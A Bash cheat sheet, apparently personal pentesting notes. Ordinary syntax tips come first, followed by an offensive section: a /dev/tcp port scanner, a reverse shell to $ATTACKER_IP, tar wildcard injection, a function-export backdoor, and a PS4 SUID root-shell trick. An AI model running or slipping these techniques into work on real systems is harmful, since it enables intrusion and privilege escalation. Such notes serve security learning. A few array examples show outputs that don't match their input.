
Bash scripting

# Brace expansion
{X,Y}      # X Y
{X,Y}.txt  # X.txt Y.txt
{1..10}    # 1 2 3 4 5 6 7 8 9 10
{1..10..2} # 1 3 5 7 9
# Special variables
$#   # Number of arguments to script/function
$1   # First argument
$9   # Ninth argument (NOTE: there is no $10 and higher)
"$@" # All arguments as a separate quoted strings
"$*" # All arguments as a single string separated by
     # first IFS character
# IFS is the string of characters that act as delimeters
# (for example, in loops). If unset, it's equal to the
# sequence <space><tab><newline>.
# Length of a variable
${#MYVAR} # 25
# Variable manipulation
${MYVAR%.*}            # /path/to/file/file.tar
${MYVAR%%.*}           # /path/to/file/file
${MYVAR#*/}            # path/to/file/file.tar.gz
${MYVAR##*/}           # file.tar.gz
${MYVAR/file/newfile}  # /path/to/newfile/file.tar.gz
${MYVAR//file/newfile} # /path/to/newfile/newfile.tar.gz
${MYVAR:1:4}           # path
${MYVAR:(-6):3}        # tar
# Setting defaults
${MYVAR:-default} # Return $MYVAR, or "default" if unset
${MYVAR:=default} # Set $MYVAR to "default" if unset
${MYVAR:+default} # Return "default" if $MYVAR set
${MYVAR:?error}   # Exit with "error" if $MYVAR unset
# Variable variables
VAR1="Hello world"
${!VAR2} # Hello world
# Arrays
MYARRAY=("element0" "element1" "element2")
${MYARRAY[0]}     # element0
${MYARRAY[-1]}    # element3
${MYARRAY[@]}     # element0 element1 element2 element3
${MYARRAY[@]:1:2} # element1 element2
${!MYARRAY[@]}    # 0 1 2 3
# Size of an array
${#MYARRAY[@]} # 4
# Remove an element from an array
unset MYARRAY[3]
# Arrays are actually a special case of dictionaries,
# which hold key/value pairs. In an array, keys are just
# 0-indexed numbers. Dictionaries work exactly the same
# as arrays, except rather than referencing/setting
# elements by number, you reference and set them by key.
# Create a dictionary
declare -A MYDICT
# Math
$(( 1 + 2 )) # 3
$RANDOM      # Random-ish number
# Loop over lines in a file
cat $FILE | while read -r LINE; do
	# Do stuff with $LINE
# Loop over filenames with spaces
while IFS= read -d '' -r FILE; do
	# Do stuff with $FILE
done < <(find $DIR -type f -print0)
# The advantage this has over other approaches is that it
# doesn't create a subshell, so you can use variables set
# within the loop elsewhere. We need to temporarily
# override IFS because our list is null-separated; the
# space between the -d and the '' (an empty string, which
# Bash interprets as the null character) is *required*.
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Debugging Bash scripts

Using the -x flag will force Bash to output each line of the shell script you’re running before that line is executed. This can be useful for debugging.

bash -x ./

The -x flag can also be incorporated into the interpreter line.

#!/usr/bin/env bash -x
# Script content...

Finally, this mode can be toggled on and off with the set command within the script itself.

#!/usr/bin/env bash
# Some script content...
set -x
# These lines will be echoed before execution.
set +x
# These lines will not be echoed...

Frequently set -x is used at the start of a script without a closing set +x, which will just cause all lines of the script to be echoed back before execution.

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Port scanning

Port scanning with Bash

(: </dev/tcp/$IP_ADDRESS/$PORT) &>/dev/null && echo "OPEN" || echo "CLOSED"
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A simple reverse shell

Bash reverse shell

bash -li &> /dev/tcp/$ATTACKER_IP/$LISTENER_PORT 0>&1

(Based on the PayloadsAllTheThings Bash TCP reverse shell.)

Catch it with netcat or socat.

(That said, the fact that all of my file descriptors wind up pointing at /dev/tcp is a little mysterious to me. I think what’s happening here is that /dev/tcp is bidirectional “out of the box” — incoming data comes out, just as outgoing data goes in — so binding all three “core” file descriptors to it does the right thing. That, and realize that the X>&Y construct means “bind file descriptor X to file descriptor Y”, and &> is just short for 2>&1 >, and > is just short for 1 >. So really what’s happening here is that we bind STDERR to STDOUT with and implicit 2>&1, then bind STDOUT to /dev/tcp with an implicit 1 >, then bind STDIN to /dev/tcp as well with 0>&1.)

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Using wildcard expansion to pass command line options

Abusing wildcard expansion in Bash

The wildcard expansion (*) in Bash scripts doesn’t get pushed to the command, but is instead expanded in place. This means that files named like command-line switches will be interpreted as command line switches. This can be used, for example, to exploit sloppy tar-based backup scripts.

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Exploiting functions

How to use Bash functions to “backdoor” executables

This only works on versions of Bash before v4.2-048!

In versions of Bash < 4.2-048, it’s possible to export functions with the same form as absolute paths to files. These functions will then be executed instead of the fully-specified path if the calling application is relying on the current shell for helper execution.

For example:

function /path/to/executable { /bin/bash -p; }
export -f /path/to/executable
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Exploiting $PS4

How to exploit the Bash PS4 (debugging) prompt

This only works on versions of Bash before v4.4!

When Bash is in debugging mode (SHELLOPTS=xtrace), the $PS4 prompt is used to display debugging information.

It would appear that this prompt somehow inherits the permissions of the executable being run. This includes SUID/SGID permissions (at least for Bash < 4.4)!

If you have access to a SUID/SGID executable, this can be abused to create root shells:

env -i \
SHELLOPTS=xtrace \
PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' \

Again, this only works if the calling application is relying on the current shell for helper execution.

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Avoid dropping privileges with SUID Bash

How to avoid dropping privileges with SUID Bash

Bash will drop privileges by default if SUID. To avoid this, simply supply the -p flag.

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